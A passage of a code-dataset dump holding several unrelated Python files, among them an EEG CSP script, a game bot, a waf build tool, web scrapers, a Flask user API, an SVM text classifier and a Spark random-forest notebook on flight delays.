npzfile['y_Train']\n\n\tdef run_csp(self):\n\t\t# obtaining the set of 12 spatial filters across an average of all subjects.\n\t\tself.load_data()\n\n\t\tw_4d = generate_projection(self.train_data,self.train_label,self.NO_csp,self.filter_bank,self.time_windows,self.NO_classes) # obtain filter\n\t\tw = dimension_reduction(w_4d, self.NO_channels, self.NO_csp) # dimension reduction (for multiscale CSP)\n\n\t\tnp.savetxt(f'{results_dir}/w_{self.NO_classes}class_csp.csv', w) # saving file\n\n\tdef channel_selection(self):\n\t\t# channel selection from saved spatial filters\n\t\tw = np.loadtxt(open(f'{results_dir}/w_{self.NO_classes}class_csp.csv', \"rb\"), delimiter=\" \")\n\n\t\tif self.channel_selection_method == 1: #V1 using w squared sum\n\t\t\tselected_channels = channel_selection_squared_sum(w, self.NO_channels, self.NO_selected_channels)\n\t\telif self.channel_selection_method == 2: # V2 using CSP-ranking\n\t\t\tselected_channels = channel_selection_csprank(w, self.NO_channels, self.NO_selected_channels, self.NO_csp)\n\n\t\treturn selected_channels\n\ndef main():\n\tprint(\"Starting program...\")\n\tmodel = CSP_Model()\n\n\tif model.obtain_filter:\n\t\tmodel.run_csp()\n\n\tif model.run_channel_selection:\n\t\tprint(\"The selected channels are: \")\n\t\tprint(model.channel_selection())\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"main_csp.py","file_name":"main_csp.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230140417","text":"\"\"\"\r\nA simple bot that presses buttons when emerging from block or hit stun.\r\n\r\n\"\"\"\r\n\r\nfrom Bot import Bot\r\nfrom TekkenGameState import TekkenGameState\r\nfrom BotData import BotBehaviors\r\nfrom NotationParser import ParseMoveList\r\n\r\n\r\nclass BotFrameTrap(Bot):\r\n\r\n def __init__(self, botCommands):\r\n super().__init__(botCommands)\r\n self.SetFrameTrapCommandFromNotationString(\"+4\")\r\n\r\n\r\n def Update(self, gameState: TekkenGameState):\r\n BotBehaviors.Basic(gameState, self.botCommands)\r\n\r\n if self.botCommands.IsAvailable():\r\n BotBehaviors.BlockAllAttacks(gameState, self.botCommands)\r\n if gameState.IsBotBlocking() or gameState.IsBotGettingHit():\r\n self.botCommands.AddCommand(self.response)\r\n\r\n\r\n def SetFrameTrapCommandFromNotationString(self, notation: str):\r\n try:\r\n self.response = ParseMoveList(\">, \" + notation)\r\n except:\r\n print(\"Could not parse move: \" + notation)\r\n\r\n","sub_path":"BotFrameTrap.py","file_name":"BotFrameTrap.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563405902","text":"#! /usr/bin/env python\n\"\"\"\nThis tool supports the export_symbols_regex to export the symbols in a shared library.\nby default, all symbols are exported by gcc, and nothing by msvc.\nto use the tool, do something like:\n\ndef build(ctx):\n\tctx(features='c cshlib syms', source='a.c b.c', export_symbols_regex='mylib_.*', target='testlib')\n\nonly the symbols starting with 'mylib_' will be exported.\n\"\"\"\nimport re\n\nfrom waflib.Context import STDOUT\nfrom waflib.Errors import WafError\nfrom waflib.Task import Task\nfrom waflib.TaskGen import after_method\nfrom waflib.TaskGen import feature\n\n\nclass gen_sym(Task):\n def run(self):\n obj = self.inputs[0]\n kw = {}\n\n reg = getattr(self.generator, \"export_symbols_regex\", \".+?\")\n if \"msvc\" in (self.env.CC_NAME, self.env.CXX_NAME):\n re_nm = re.compile(r\"External\\s+\\|\\s+_(?P%s)\\b\" % reg)\n cmd = (self.env.DUMPBIN or [\"dumpbin\"]) + [\"/symbols\", obj.abspath()]\n else:\n if (\n self.env.DEST_BINFMT == \"pe\"\n ): # gcc uses nm, and has a preceding _ on windows\n re_nm = re.compile(r\"(T|D)\\s+_(?P%s)\\b\" % reg)\n elif self.env.DEST_BINFMT == \"mac-o\":\n re_nm = re.compile(r\"(T|D)\\s+(?P_?%s)\\b\" % reg)\n else:\n re_nm = re.compile(r\"(T|D)\\s+(?P%s)\\b\" % reg)\n cmd = (self.env.NM or [\"nm\"]) + [\"-g\", obj.abspath()]\n syms = [\n m.group(\"symbol\")\n for m in re_nm.finditer(\n self.generator.bld.cmd_and_log(cmd, quiet=STDOUT, **kw)\n )\n ]\n self.outputs[0].write(\"%r\" % syms)\n\n\nclass compile_sym(Task):\n def run(self):\n syms = {}\n for x in self.inputs:\n slist = eval(x.read())\n for s in slist:\n syms[s] = 1\n lsyms = list(syms.keys())\n lsyms.sort()\n if self.env.DEST_BINFMT == \"pe\":\n self.outputs[0].write(\"EXPORTS\\n\" + \"\\n\".join(lsyms))\n elif self.env.DEST_BINFMT == \"elf\":\n self.outputs[0].write(\n \"{ global:\\n\" + \";\\n\".join(lsyms) + \";\\nlocal: *; };\\n\"\n )\n elif self.env.DEST_BINFMT == \"mac-o\":\n self.outputs[0].write(\"\\n\".join(lsyms) + \"\\n\")\n else:\n raise WafError(\"NotImplemented\")\n\n\n@feature(\"syms\")\n@after_method(\n \"process_source\",\n \"process_use\",\n \"apply_link\",\n \"process_uselib_local\",\n \"propagate_uselib_vars\",\n)\ndef do_the_symbol_stuff(self):\n def_node = self.path.find_or_declare(\n getattr(self, \"sym_file\", self.target + \".def\")\n )\n compiled_tasks = getattr(self, \"compiled_tasks\", None)\n if compiled_tasks:\n ins = [x.outputs[0] for x in compiled_tasks]\n self.gen_sym_tasks = [\n self.create_task(\"gen_sym\", x, x.change_ext(\".%d.sym\" % self.idx))\n for x in ins\n ]\n self.create_task(\n \"compile_sym\", [x.outputs[0] for x in self.gen_sym_tasks], def_node\n )\n\n link_task = getattr(self, \"link_task\", None)\n if link_task:\n self.link_task.dep_nodes.append(def_node)\n\n if \"msvc\" in (self.env.CC_NAME, self.env.CXX_NAME):\n self.link_task.env.append_value(\"LINKFLAGS\", [\"/def:\" + def_node.bldpath()])\n elif self.env.DEST_BINFMT == \"pe\":\n # gcc on windows takes *.def as an additional input\n self.link_task.inputs.append(def_node)\n elif self.env.DEST_BINFMT == \"elf\":\n self.link_task.env.append_value(\n \"LINKFLAGS\", [\"-Wl,-version-script\", \"-Wl,\" + def_node.bldpath()]\n )\n elif self.env.DEST_BINFMT == \"mac-o\":\n self.link_task.env.append_value(\n \"LINKFLAGS\", [\"-Wl,-exported_symbols_list,\" + def_node.bldpath()]\n )\n else:\n raise WafError(\"NotImplemented\")\n","sub_path":"docs/.mywaflib/waflib/extras/syms.py","file_name":"syms.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"529137437","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport jsonlines\nimport argparse\nimport time\nfrom tqdm import tqdm\n\n\ndef get_definition(driver, mag_url):\n driver.get(mag_url)\n html = None\n\n w = WebDriverWait(driver, 8)\n w.until(EC.presence_of_element_located((By.TAG_NAME, \"h1\")))\n print(\"Page load happened\")\n html = driver.page_source\n soup = BeautifulSoup(html, \"html.parser\")\n try:\n definitions = [\n x.get_text()\n for x in soup.find(\"div\", class_=\"name-section\").find_all(\n \"p\", text=True, recursive=False\n )\n ]\n if len(definitions) == 1:\n return definitions[0]\n else:\n return \"-1\"\n except:\n return \"-1\"\n\n\ndef get_defs_for_all_concepts(concepts, out_path):\n \"\"\"\n Process the concepts one by one\n \"\"\"\n count_all = len(concepts)\n with jsonlines.open(out_path, \"w\") as fout:\n driver = webdriver.Chrome(\"./webdriver/chromedriver_win64.exe\")\n count = 0\n for cid in tqdm(concepts):\n count += 1\n if count % 20 == 0:\n print(cid)\n time.sleep(100)\n url = f\"https://academic.microsoft.com/topic/{cid}/publication\"\n def_str = \"\"\n try:\n def_str = get_definition(driver, url)\n finally:\n fout.write({\"id\": cid, \"concept\": concepts[cid], \"definition\": def_str})\n driver.quit()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--concept_file\", default=\"./data/computer_science_jinfeng.terms\")\n parser.add_argument(\"--out_path\", default=\"./data/concept_definition.jsonl\")\n args = parser.parse_args()\n concepts = dict()\n with open(args.concept_file) as fin:\n for line in fin:\n cid, cpt = line.strip(\"\\n\\t\\r \").split(\"\\t\")[:2]\n concepts[cid] = cpt\n get_defs_for_all_concepts(concepts, out_path=args.out_path)\n","sub_path":"MAG_scrap_demo.py","file_name":"MAG_scrap_demo.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"243307416","text":"title=\"++ List received SMS messages\"\nimport os\nimport sys\nfrom datetime import date\nfrom twilio.rest import Client\n#\naccount_sid = os.environ.get(\"ACCOUNT_SID\")\nauth_token = os.environ.get(\"AUTH_TOKEN\")\nclient = Client(account_sid, auth_token)\n#\nif len(sys.argv) > 1:\n parDate = sys.argv[1];\n title = title + \" for the date: \" + parDate; # Example: 2018-06-13\n messages = client.messages.list(date_sent=date(int(parDate[:4]), int(parDate[:7][5:]), int(parDate[:10][8:])));\nelse:\n messages = client.messages.list();\n#\nprint( title + \" (Date Time From To : Text):\")\nprevMsgDate = messages[0].date_sent.strftime('%Y-%m-%d');\nfor message in messages:\n curMsgDate = message.date_sent.strftime('%Y-%m-%d');\n if prevMsgDate != curMsgDate:\n print\n prevMsgDate = curMsgDate;\n if message.status == \"received\":\n print(\"+ \" + message.date_sent.strftime('%Y-%m-%d %H:%M:%S') + \" \" + message.from_ + \" \" + message.to + \" : \" + message.body)\n # Other data values: message.sid message.status\nprint(\"+ End of list.\")\n\n","sub_path":"notify/listSmsMsg.py","file_name":"listSmsMsg.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"451551794","text":"\"\"\"\nGiven a string s consisting of small lowercase English letters, find and return the first\ninstance of a non-repeating character in it. If there is no such character, return '_'.\n\nRequirement: Iterate over the string once and use O(1) additional memory\n\nSolution: Use an array of length 26 (alphabet size) to keep track of characters\n-2 means uninitialized\n-1 means repeated\nPositive number means index of first occurence in the string s\n\nThen the smallest positive integer in the array points to the first non-repeating character in s\n\"\"\"\ndef firstNotRepeatingCharacter(s):\n array = [-2 for i in range(26)]\n\n for i in range(len(s)):\n index = ord(s[i]) - 97\n # First occurence:\n if array[index] == -2:\n array[index] = i\n # Repetition detected:\n elif array[index] != -1:\n array[index] = -1\n \n # Find smallest positive integer\n smallest = -1\n for number in array:\n if number < 0:\n continue\n elif smallest == -1 or number < smallest:\n smallest = number\n \n if smallest == -1:\n return '_'\n else:\n return s[smallest]\n","sub_path":"arrays/firstNotRepeatingCharacter.py","file_name":"firstNotRepeatingCharacter.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"398784038","text":"import configparser\nimport argparse\nimport pickle\nimport json\nimport os\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import MultiLabelBinarizer\nfrom sklearn.metrics import f1_score\n\ndef load_data(data_path):\n texts = []\n tags = []\n with open(data_path) as f:\n for line in f:\n item = json.loads(line)\n texts.append(item[\"text\"])\n tags.append(item[\"tags\"])\n return texts, tags\n\ndef train(data_dir, model_dir, min_df=5, max_features=None, lowercase=True,\n stopwords=\"english\", ngram_range=(1,1), kernel=\"linear\", class_weight=None):\n print(\"Loading data\")\n data_path = os.path.join(data_dir, \"data.jsonl\")\n X, Y = load_data(data_path)\n\n print(\"Fitting label binarizer\")\n label_binarizer = MultiLabelBinarizer()\n label_binarizer.fit(Y)\n\n Y_vec = label_binarizer.transform(Y)\n \n print(\"Splitting data\")\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y_vec, random_state=42)\n \n print(\"Fitting model\")\n model = Pipeline([\n (\"tfidf\", TfidfVectorizer(\n min_df=min_df,\n max_features=max_features,\n lowercase=lowercase,\n stop_words=stopwords,\n ngram_range=ngram_range\n )),\n (\"svm\", OneVsRestClassifier(SVC(\n kernel=kernel,\n class_weight=class_weight\n )))\n ])\n\n model.fit(X_train, Y_train)\n\n print(\"Evaluating model\")\n Y_pred = model.predict(X_test)\n f1 = f1_score(Y_test, Y_pred, average=\"micro\")\n print(f\"Score f1 {f1:.4f}\")\n\n model_path = os.path.join(model_dir, \"firebreak-model.pkl\")\n label_binarizer_path = os.path.join(model_dir, \"firebreak-label_binarizer.pkl\")\n with open(model_path, \"wb\") as f:\n f.write(pickle.dumps(model))\n with open(label_binarizer_path, \"wb\") as f:\n f.write(pickle.dumps(label_binarizer))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model_path\", type=str)\n parser.add_argument(\"--data_path\", type=str)\n parser.add_argument(\"--min_df\", type=int, default=5)\n parser.add_argument(\"--max_features\", type=int, default=None)\n parser.add_argument(\"--lowercase\", type=bool, default=True)\n parser.add_argument(\"--stopwords\", type=str, default=\"english\")\n parser.add_argument(\"--ngram_range\", type=tuple, default=(1,1))\n parser.add_argument(\"--kernel\", type=str, default=\"linear\")\n parser.add_argument(\"--class_weight\", type=str, default=None)\n parser.add_argument(\"--config\", type=str)\n parser.add_argument(\"--cloud\", action=\"store_true\")\n args = parser.parse_args()\n\n if args.config:\n cfg = configparser.ConfigParser(allow_no_value=True)\n cfg.read(args.config)\n \n data_path = cfg[\"input\"][\"path\"]\n model_path = cfg[\"output\"][\"path\"]\n min_df = cfg[\"tfidf\"].getint(\"min_df\", 5)\n max_features = cfg[\"tfidf\"].get(\"max_features\")\n lowercase = cfg[\"tfidf\"].getboolean(\"lowercase\", True)\n stopwords = cfg[\"tfidf\"].get(\"stopwords\", \"english\")\n ngram_range = cfg[\"tfidf\"].get(\"ngram_range\", [1,1])\n kernel = cfg[\"svm\"].get(\"kernel\", \"linear\")\n class_weight = cfg[\"svm\"].get(\"class_weight\")\n else:\n data_path = args.data_path\n model_path = args.model_path\n min_df = args.min_df\n max_features = args.max_features\n lowercase = args.lowercase\n stopwords = args.stopwords\n ngram_range = args.ngram_range\n kernel = args.kernel\n class_weight = args.class_weight\n \n if args.cloud:\n data_path = \"/opt/ml/input/data/training\"\n model_path = \"/opt/ml/models\"\n\n train(data_path, model_path, min_df, max_features,\n lowercase, stopwords, ngram_range, kernel, class_weight)\n\n","sub_path":"grants_tagger/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"80586966","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass AppleBarrel(Model):\n \"\"\"A barrel of apples.\n\n :param good_apples:\n :type good_apples: list[str]\n :param bad_apples:\n :type bad_apples: list[str]\n \"\"\"\n\n _attribute_map = {\n 'good_apples': {'key': 'GoodApples', 'type': '[str]', 'xml': {'name': 'GoodApples', 'itemsName': 'Apple', 'wrapped': True}},\n 'bad_apples': {'key': 'BadApples', 'type': '[str]', 'xml': {'name': 'BadApples', 'itemsName': 'Apple', 'wrapped': True}},\n }\n _xml_map = {\n }\n\n def __init__(self, *, good_apples=None, bad_apples=None, **kwargs) -> None:\n super(AppleBarrel, self).__init__(**kwargs)\n self.good_apples = good_apples\n self.bad_apples = bad_apples\n","sub_path":"test/vanilla/Expected/AcceptanceTests/Xml/xmlservice/models/apple_barrel_py3.py","file_name":"apple_barrel_py3.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"108324944","text":"model = Word2Vec(window = 10, sg = 1, hs = 0,\n negative = 10, # for negative sampling\n alpha=0.03, min_alpha=0.0007,\n seed = 14)\n\nmodel.build_vocab(purchases_train, progress_per=200)\n\nmodel.train(purchases_train, total_examples = model.corpus_count,\n epochs=10, report_delay=1)\n\nmodel2 = gensim.models.Word2Vec(data, min_count = 1, size = 100,\n window = 5, sg = 1)\n","sub_path":"Anuja/wordToVec_Gensim.py","file_name":"wordToVec_Gensim.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"448011269","text":"#!/usr/bin/python3\n\"\"\" amenity view file \"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, request, abort\nimport models\nfrom models import storage\nfrom models.user import User\n\n\n@app_views.route(\"/users\", strict_slashes=False, methods=['GET'])\ndef get_all_users():\n \"\"\" routing for retrieving all users \"\"\"\n users = storage.all(User).values()\n retval = []\n for obj in users:\n retval.append(obj.to_dict())\n return jsonify(retval)\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['GET'])\ndef get_one_user(user_id):\n \"\"\" gets an amenity from an amenity id \"\"\"\n user = storage.get(User, user_id)\n if user is None:\n abort(404)\n return jsonify(user.to_dict())\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['DELETE'])\ndef delete_user(user_id):\n \"\"\" deletes a user from id \"\"\"\n user = storage.get(User, user_id)\n if user is None:\n abort(404)\n storage.delete(user)\n storage.save()\n return jsonify({}), 200\n\n\n@app_views.route(\"/users\", strict_slashes=False, methods=['POST'])\ndef postcreate_user():\n \"\"\" creates new amenity object \"\"\"\n req = request.get_json()\n if req is None:\n abort(400, \"Not a JSON\")\n if \"email\" not in req:\n abort(400, \"Missing email\")\n if \"password\" not in req:\n abort(400, \"Missing password\")\n new_user = models.user.User(**req)\n new_user.save()\n return jsonify(new_user.to_dict()), 201\n\n\n@app_views.route(\"/users/\", strict_slashes=False,\n methods=['PUT'])\ndef user_update(user_id):\n \"\"\" updates the user \"\"\"\n user = storage.get(User, user_id)\n if user is None:\n abort(404)\n req = request.get_json()\n if req is None:\n abort(400, \"Not a JSON\")\n req.pop(\"id\", None)\n req.pop(\"email\", None)\n req.pop(\"created_at\", None)\n req.pop(\"updated_at\", None)\n for key, val in req.items():\n setattr(user, key, val)\n user.save()\n return jsonify(user.to_dict()), 200\n","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"266447029","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom pprint import pprint\nimport json\nfrom task import scrape_top_list\nAll_movies_data = scrape_top_list()\n\ndef group_by_decade(movies):\n dec_list = []\n dec_dict = {}\n for i in movies:\n y = int(i[\"Movies_year\"][1:5])\n module = y%10\n dec = y-module\n if dec not in dec_list:\n dec_list.append(dec)\n dec_list.sort()\n for i in dec_list:\n dec_dict[i]=[]\n for j in dec_dict:\n a = j+9\n for k in movies:\n b = int(k[\"Movies_year\"][1:5])\n if b<=a and b>=j:\n dec_dict[j].append(k)\n with open (\"decades_movies.json\",\"w\")as IMDB:\n json.dump(dec_dict,IMDB,indent=4) \n return dec_dict\ngroup_by_decade(All_movies_data)","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"344027684","text":"# Databricks notebook source\n# MAGIC %md #### Create toy example of random forests for final notebook\n\n# COMMAND ----------\n\n# package imports\nfrom pyspark.sql.types import StructType, StructField, StringType, DoubleType, IntegerType, NullType, ShortType, DateType, BooleanType, BinaryType\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql import types\nfrom pyspark.sql.functions import col, lag, udf, to_timestamp, monotonically_increasing_id\nimport pyspark.sql.functions as f\nfrom pyspark.sql.window import Window\nfrom pandas.tseries.holiday import USFederalHolidayCalendar\nfrom datetime import datetime, timedelta\nfrom pyspark.ml.feature import IndexToString, StringIndexer, OneHotEncoder, VectorAssembler, Bucketizer, StandardScaler\nimport pandas as pd\nfrom pyspark.ml.classification import RandomForestClassifier as RF, DecisionTreeClassifier as DT\nfrom pyspark.ml import Pipeline\n\n# COMMAND ----------\n\n# initialize the sql context\nsqlContext = SQLContext(sc)\n\n# COMMAND ----------\n\n# global variables\n\n# shared directory for our team (make sure it exists)\nfinal_project_path = \"dbfs:/mnt/mids-w261/group_5/\"\ndbutils.fs.mkdirs(final_project_path)\n\n# output paths\ntrain_data_output_path = final_project_path + \"training_data_output/train.parquet\"\ntest_data_output_path = final_project_path + \"training_data_output/test.parquet\"\ntrain_toy_output_path = final_project_path + \"training_data_output/train_toy.parquet\"\ntest_toy_output_path = final_project_path + \"training_data_output/test_toy.parquet\"\n\n# COMMAND ----------\n\ndisplay(dbutils.fs.ls(\"dbfs:/mnt/mids-w261/group_5\"))\n\n# COMMAND ----------\n\n# Read in parquet file\ntrain_set = spark.read.parquet(train_data_output_path)\n\n# COMMAND ----------\n\n# MAGIC %md ## Algorithm Implementation\n\n# COMMAND ----------\n\n# MAGIC %md We have selected Random Forests (RF) as the final model based on results from the above exploritory algorithm analysis. We will demonstrate a decision tree classifier using a toy example with 3 features from the flight delay training data and continue with an explaination of the RF algorithm. \n\n# COMMAND ----------\n\n# MAGIC %md #### Toy Example\n\n# COMMAND ----------\n\n# MAGIC %md ##### Example Data\n# MAGIC First we separate 20% of the training data that the toy model will use to make predictions. Then we select 3 features from the dataset to visualize the trees that RF will build and compile these into a feature vector for the model.\n\n# COMMAND ----------\n\n# Divide training data into train and test set with features for example\ntrain_toy, test_toy = train_set.select(\"label\", \"fl_date\", \"PREVIOUS_FLIGHT_DELAYED_FOR_MODELS_Index\", \"origin_avg_dep_delay\", \"day_of_week_Index\", \"crs_dep_hour_Index\", \"month_Index\").randomSplit([0.8, 0.2], seed = 1)\n\n# COMMAND ----------\n\n# Select 3 features and compile into feature vector\nfeatures = [\"PREVIOUS_FLIGHT_DELAYED_FOR_MODELS_Index\", \"origin_avg_dep_delay\", \"crs_dep_hour_Index\"]\nassembler = VectorAssembler(inputCols=features, outputCol=\"features\").setHandleInvalid(\"keep\")\n\ntrain_toy = assembler.transform(train_toy)\ntest_toy = assembler.transform(test_toy)\n\n# COMMAND ----------\n\ntrain_toy.write.format(\"parquet\").mode(\"overwrite\").save(train_toy_output_path)\ntest_toy.write.format(\"parquet\").mode(\"overwrite\").save(test_toy_output_path)\n\n# COMMAND ----------\n\ntrain_toy = spark.read.option(\"header\", \"true\").parquet(train_toy_output_path)\ntest_toy = spark.read.option(\"header\", \"true\").parquet(test_toy_output_path)\n\n# COMMAND ----------\n\n# MAGIC %md ##### Training Decision Trees \n# MAGIC \n# MAGIC Next we will train a decision tree. Each tree is constructed with a series of splitting rules. The example figure below builds one tree with 3 available features. The first node at the top of the tree is split based on whether the previous flight is delayed. From the right branch the next split is on scheduled departure hour of day. The tree increases depth by choosing the best split considering all features and split points. These splits divide the training examples into 7 regions, at the leaf nodes, based on the combination of their features. \n# MAGIC \n# MAGIC How does the model decide splits? Our classification tree splits at the point which minimizes the *gini index*, a measure of node purity. The equation for the gini index is shown below, where \\\\(\\hat{p}\\_{mk}\\\\) is the proportion of examples in region \\\\(m\\\\) of class \\\\(k\\\\). \n# MAGIC \n# MAGIC $$ G = \\sum\\_{k=1}^{K} {\\hat{p}\\_{mk} (1 - \\hat{p}\\_{mk})} $$\n# MAGIC \n# MAGIC The gini index will be minimized when \\\\(\\hat{p}\\_{m, k=0}\\\\) and \\\\(\\hat{p}\\_{m, k=1}\\\\) are close to 0 or 1, or when almost all the flight examples in the region are either delayed or not delayed. \n\n# COMMAND ----------\n\n# Simple decision tree model\ndt = DT(labelCol=\"label\", featuresCol=\"features\")\nDT_model = dt.fit(train_toy)\n\ndisplay(DT_model)\n\n# COMMAND ----------\n\n# MAGIC %md ##### Make Predictions\n# MAGIC To make a prediction using the decision tree, we assign a test data point to the leaf node (region) of the tree to which it belongs based on its features. The predicted class for a test example in region \\\\(m\\\\) is \\\\(argmax\\_k\\\\) \\\\(\\hat{p}\\_{mk}\\\\), or the majority class. \n# MAGIC \n# MAGIC Below is an example of a prediction on a test example. For this example, the previous flight for the aircraft was delayed (feature 0 = 1) which moves down the left branch from the top of the tree. This flight's departure time is in hour 15, which moves it down the right branch of the next node. Next, the average delay at the origin airport 3 hours before is 12.9 minutes, which is less than the split point at 14.6 minutes. Lastly, repeating the hour of day feature for a split increases node purity and this flight is predicted to have no delay.\n\n# COMMAND ----------\n\n# Add row number to compare predictions for the same test example\ntest_toy = test_toy.withColumn(\"row\", f.monotonically_increasing_id())\n\n# COMMAND ----------\n\n# Predict on toy test set\npred_toy_DT = DT_model.transform(test_toy)\n\n# Create dataframe with predictions and show example\nlabelAndPrediction = pred_toy_DT.select(\"label\", \"row\", \"prediction\", \"features\")\ndisplay(labelAndPrediction.where(labelAndPrediction.row == 575525629176))\n\n# COMMAND ----------\n\n# MAGIC %md ##### RF Algorithm\n# MAGIC The method of averaging many trees grown from repeated samples of the training data, or bagging, decreases variance of the model that would occur with any one tree. Bagging grows deep trees and does not prune. The RF training method goes a step further to help guarantee a more reliable result. RF trees are built such that each node is randomly assigned a subset of features that will be considered as possible split candidates. This means that the trees will differ from each other, which when averaged will decrease variance more than bagging alone. \n# MAGIC \n# MAGIC Below we will train a RF model on the same data using 3 trees.\n\n# COMMAND ----------\n\n# RF model\nrf = RF(labelCol=\"label\", featuresCol=\"features\", numTrees=3, maxDepth=5)\nRF_model = rf.fit(train_toy)\n\n# COMMAND ----------\n\n# Print tree nodes for all RF trees\nprint(RF_model.toDebugString)\n\n# COMMAND ----------\n\n# MAGIC %md ##### Prediction with RF\n# MAGIC RF then combines these predictions for all trees using a majority vote. If \\\\(\\hat{p}\\_{n,k}\\\\) is the proportion of predictions for class \\\\(k\\\\) over \\\\(n\\\\) trees, the majority vote is \\\\(argmax\\_k\\\\) \\\\(\\hat{p}\\_{n,k}\\\\).\n\n# COMMAND ----------\n\n# Predict on toy test set with RF\npred_toy_RF = RF_model.transform(test_toy)\n\n# Create dataframe with predictions and show example\nlabelAndPrediction_RF = pred_toy_RF.select(\"label\", \"row\", \"prediction\", \"features\")\ndisplay(labelAndPrediction_RF.where(labelAndPrediction_RF.row == 575525629176))\n\n# COMMAND ----------\n\n# MAGIC %md The above test example has the following features: previous flight delayed, average delay at origin airport = 12.9 minutes, scheduled hour of departure delay = 15. The RF model predicts this as a delay.\n\n# COMMAND ----------\n\n# MAGIC %md #### Find test example to use (not for final notebook)\n\n# COMMAND ----------\n\nlabelAndPrediction_RF_join = labelAndPrediction_RF.withColumnRenamed(\"prediction\", \"prediction_RF\").select(\"prediction_RF\", \"row\")\nlabelAndPrediction_join = labelAndPrediction_RF_join.join(labelAndPrediction, \"row\", \"inner\")\ndisplay(labelAndPrediction_join.sample(False, 0.0001))\n\n# COMMAND ----------\n\ndisplay(labelAndPrediction_join.where((f.col(\"label\") == f.col(\"prediction_RF\")) & (f.col(\"label\") != f.col(\"prediction\"))))","sub_path":"notebooks/Airlines Delays - RF Toy Example.py","file_name":"Airlines Delays - RF Toy Example.py","file_ext":"py","file_size_in_byte":8518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"286096631","text":"\n\nclass AdminHasNotLogin(Exception):\n def __init__(self, origin_url):\n self.origin_url = origin_url\n\n\ndef checkAdminLogin(request, redirect = True):\n session = request.session\n if not 'token' in session:\n if redirect:\n raise AdminHasNotLogin(request.url)\n else:\n raise AdminHasNotLogin()\n","sub_path":"server/apps/admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"4186928","text":"from django.test import TestCase\nfrom django.urls import resolve, reverse\n\nfrom ..models import Forum\nfrom ..views import TopicListView\n\n\nclass ForumTopicsTests(TestCase):\n def setUp(self):\n Forum.objects.create(name='Digital Facets', description='Digital Facets Forum.')\n \n ''' A test case to validate status code is \"200\" '''\n def test_forum_topics_view_success_status_code(self):\n url = reverse('forum_topics', kwargs={'pk': 1})\n response = self.client.get(url)\n self.assertEquals(response.status_code, 200)\n \n ''' A test case to verify new topic does not return a 404 response (Page Not Found) '''\n def test_forum_topics_view_not_found_status_code(self):\n url = reverse('forum_topics', kwargs={'pk': 99})\n response = self.client.get(url)\n self.assertEquals(response.status_code, 404)\n \n ''' A test case to confirm new topic url resolves to new topic view '''\n def test_forum_topics_url_resolves_forum_topics_view(self):\n view = resolve('/forums/1/')\n self.assertEquals(view.func.view_class, TopicListView)\n \n ''' A test case to confirm new topic contains valid navigation links '''\n def test_forum_topics_view_contains_navigation_links(self):\n forum_topics_url = reverse('forum_topics', kwargs={'pk': 1})\n homepage_url = reverse('forum_home')\n new_topic_url = reverse('new_topic', kwargs={'pk': 1})\n response = self.client.get(forum_topics_url)\n self.assertContains(response, 'href=\"{0}\"'.format(homepage_url))\n self.assertContains(response, 'href=\"{0}\"'.format(new_topic_url))","sub_path":"forums/tests/test_view_forum_topics.py","file_name":"test_view_forum_topics.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"458232054","text":"#!/usr/bin/env python\n# -*- coding: utf-8 